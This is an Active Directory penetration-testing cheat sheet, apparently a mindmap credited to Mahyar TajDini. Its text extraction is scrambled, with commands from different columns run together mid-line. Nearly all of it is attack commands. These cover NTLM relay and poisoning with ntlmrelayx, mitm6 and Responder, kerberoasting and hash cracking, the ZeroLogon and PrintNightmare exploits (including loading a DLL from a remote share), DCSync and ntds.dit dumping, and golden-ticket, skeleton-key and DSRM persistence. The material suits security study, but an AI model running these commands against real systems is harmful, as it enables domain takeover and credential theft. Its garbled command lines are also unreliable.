Professional Documents
Culture Documents
no smb signing || ipv6 enabled || adcs powerview / pywerview Resource-Based Constrained Delegation
389 <dc-ip>
Penetration Manual user found
Lateral move
Enumerate ldap ldapsearch -x -h <ip> -s base use exploit/windows/smb/smb_relay # GetUserSPNs.py -request -dc-ip <dc_ip> < lsadump::dcsync /domain:htb.local /user:
MS08-068 windows200 / windows server2008 domain>/<user>:<password> krbtgt # Administrators, Domain Admins, or
hash found
Get hash Enterprise Admins as well as Domain Controller
responder -I eth0 # disable smb & http ntlmrelayx.py -tf targets.txt Rubeus kerberoast dcsync computer accounts
enum4linux -U <dc-ip> | grep 'user:'
ntlmrelayx.py -6 -wh <attacker_ip> -l /tmp - kerberoasting Get-DomainUser -SPN -Properties WSUSpendu.ps1 # need compromised WSUS
socks -debug SamAccountName, ServicePrincipalName WSUSpect server
crackmapexec smb <ip> -u <user> -p '<
password>' --users
user found sccm CMPivot
MATCH (u:User {hasspn:true}) RETURN u
Find user list ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<
Get kerberoastable users
nmap -p 88 --script=krb5-enum-users --script- relay mitm6 -i eth0 -d <domain> target> -l /tmp -socks -debug
args="krb5-enum-users.realm='<domain>', Got one account on the domain MATCH (u:User {hasspn:true}), (c:Computer), p= MSSQL Trusted Links use exploit/windows/mssql/mssql_linkcrawler
OSINT - enumerate username on internet userdb=<users_list_file>" <ip> ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ getST.py -spn cifs/<target> <domain>/< shortestPath((u)-[*1..]->(c)) RETURN p
ip> --delegate-access netbios_name>\$ -impersonate <user> rpcdump.py <domain>/<user>:<password>@< printerbug.py '<domain>/<username>:<
rpcclient $> lookupnames <name> Printers spooler service abuse domain_server> | grep MS-RPRN password>'@<Printer IP> <RESPONDERIP>
ntlmrelayx.py -t http://<dc_ip>/certsrv/ wmic useraccount get name,sid
nmap -Pn -sS -T4 --open --script smb-
certfnsh.asp -debug -smb2support --adcs -- Rubeus.exe asktgt /user:<user> /certificate:< auxiliary/admin/kerberos/ms14_068_kerberos_ GenericAll on User
security-mode -p445 ADDRESS/MASK
adcs template DomainController base64-certificate> /ptt checksum
unsigned SMB cracking hash GenericAll on Group
find smb not signed use exploit/windows/smb/smb_relay MS14-068 FindSMB2UPTime.py <ip>
goldenPac.py -dc-ip <dc_ip> <domain>/<
john --format=lm hash.txt user>:'<password>'@<target> kerberos::ptc "<ticket>" GenericAll / GenericWrite / Write on Computer
cme smb $hosts --gen-relay-list relay.txt
LM
hashcat -m 3000 -a 3 hash.txt dnscmd.exe /config /serverlevelplugindll <\\ sc \\DNSServer stop dns WriteProperty on Group
PetitPotam.py -d <domain> <listener_ip> < path\to\dll> # need a dnsadmin user sc \\DNSServer start dns
target_ip>
relay/poisoning john --format=nt hash.txt Self (Self-Membership) on Group
NTLM CVE-2021-1675.py <domain>/<user>:<
responder -i eth0 AD acl abuse aclpwn.py
password>@<target> '\\<smb_server_ip>\<
hashcat -m 1000 -a 3 hash.txt WriteProperty (Self-Membership)
user & hash found PrintNightmare share>\inject.dll'
mitm6 -d <domain>
john --format=netntlm hash.txt ForceChangePassword
dnstool.py -u 'DOMAIN\user' -p 'password' --
NTLMv1 enum dns record '*' --action query <dc_ip>
hashcat -m 5500 -a 3 hash.txt WriteOwner on Group
python3 cve-2020-1472-exploit.py <MACHINE_
BIOS_NAME> <ip> crack hash
find hash john --format=netntlmv2 hash.txt GenericWrite on User
secretsdump.py <DOMAIN>/<MACHINE_BIOS_
NAME>\$@<IP> -no-pass -just-dc-user " NTLMv2
Administrator" python3 restorepassword.py -target-ip <IP> < hashcat -m 5600 -a 0 hash.txt rockyou.txt WriteDACL + WriteOwner
secretsdump.py -hashes :<HASH_admin> < DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_
DOMAIN>/Administrator@<IP> BIOS_NAME> -hexpass <HEXPASS> john spn.txt --format=krb5tgs --wordlist= GPO Delegation
zerologon rockyou.txt Domain admin
Kerberos 5 TGS Get-LAPSPasswords -DomainController <ip_
hashcat -m 13100 -a 0 spn.txt rockyou.txt crackmapexec smb 127.0.0.1 -u <user> -p < dc> -Credential <domain>\<login> | Format-
password> -d <domain> --ntds Table -AutoSize
hashcat -m 18200 -a 0 AS-REP_roast-hashes
Kerberos ASREP rockyou.txt secretsdump.py '<domain>/<user>:<pass>'@< foreach ($objResult in $colResults){$
ip> objComputer = $objResult.Properties; $
get laps passwords
dump ntds.dit objComputer.name|where {$objcomputer.
Domain admin secretsdump.py -ntds ntds_file.dit -system name -ne $env:computername}|%{foreach-
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q SYSTEM_FILE -hashes lmhash:nthash LOCAL - object {Get-AdmPwdPassword -
q outputfile ntlm-extract ComputerName $_}}}
ADCS
Mahyar@TajDini.net
Persistance mayfly (@M4yFly)
Mahyar TajDini Linkedin.com/in/mahyartajdini ticketer.py -nthash <nthash> -domain-sid < kerberos::golden /user:Administrator /krbtgt:<
Golden ticket domain_sid> -domain <domain> <user> Get-NetGroup -Domain <domain> - HASH_KRBTGT> /domain:<domain> /sid:<user_
Child Domain to Forest Compromise - SID GroupName "Enterprise Admins" -FullData| sid> /sids:<RootDomainSID-519> /ptt
Hijacking select objectsid mimikatz lsadump::trust
TajDini.net Silver Ticket
"kerberos::golden /user:Administrator /
PowerShell New-ItemProperty “HKLM:\System\
domain:<domain> /sid:
CurrentControlSet\Control\Lsa\” -Name
<domain_SID> /rc4:<trust_key> /service:krbtgt / .\Rubeus.exe asktgs /ticket:<kirbi file> /
“DsrmAdminLogonBehavior” -Value 2 -
Persistance "lsadump::trust /patch" target:<target_domain> /ticket: service:"Service's SPN" /ptt
DSRM PropertyType DWORD
Forest to Forest Compromise - Trust Ticket "lsadump::lsa /patch" <golden_ticket_path>"
Trust relationship
mimikatz "privilege::debug" "misc::skeleton" "
printerbug or petitpotam to force the DC of the
Skeleton Key exit"
external forest to connect on a local
unconstrained delegation machine. Capture
mimikatz "privilege::debug" "misc::memssp" " Breaking forest trust TGT, inject into memory and dcsync
Custom SSP exit" C:\Windows\System32\kiwissp.log
...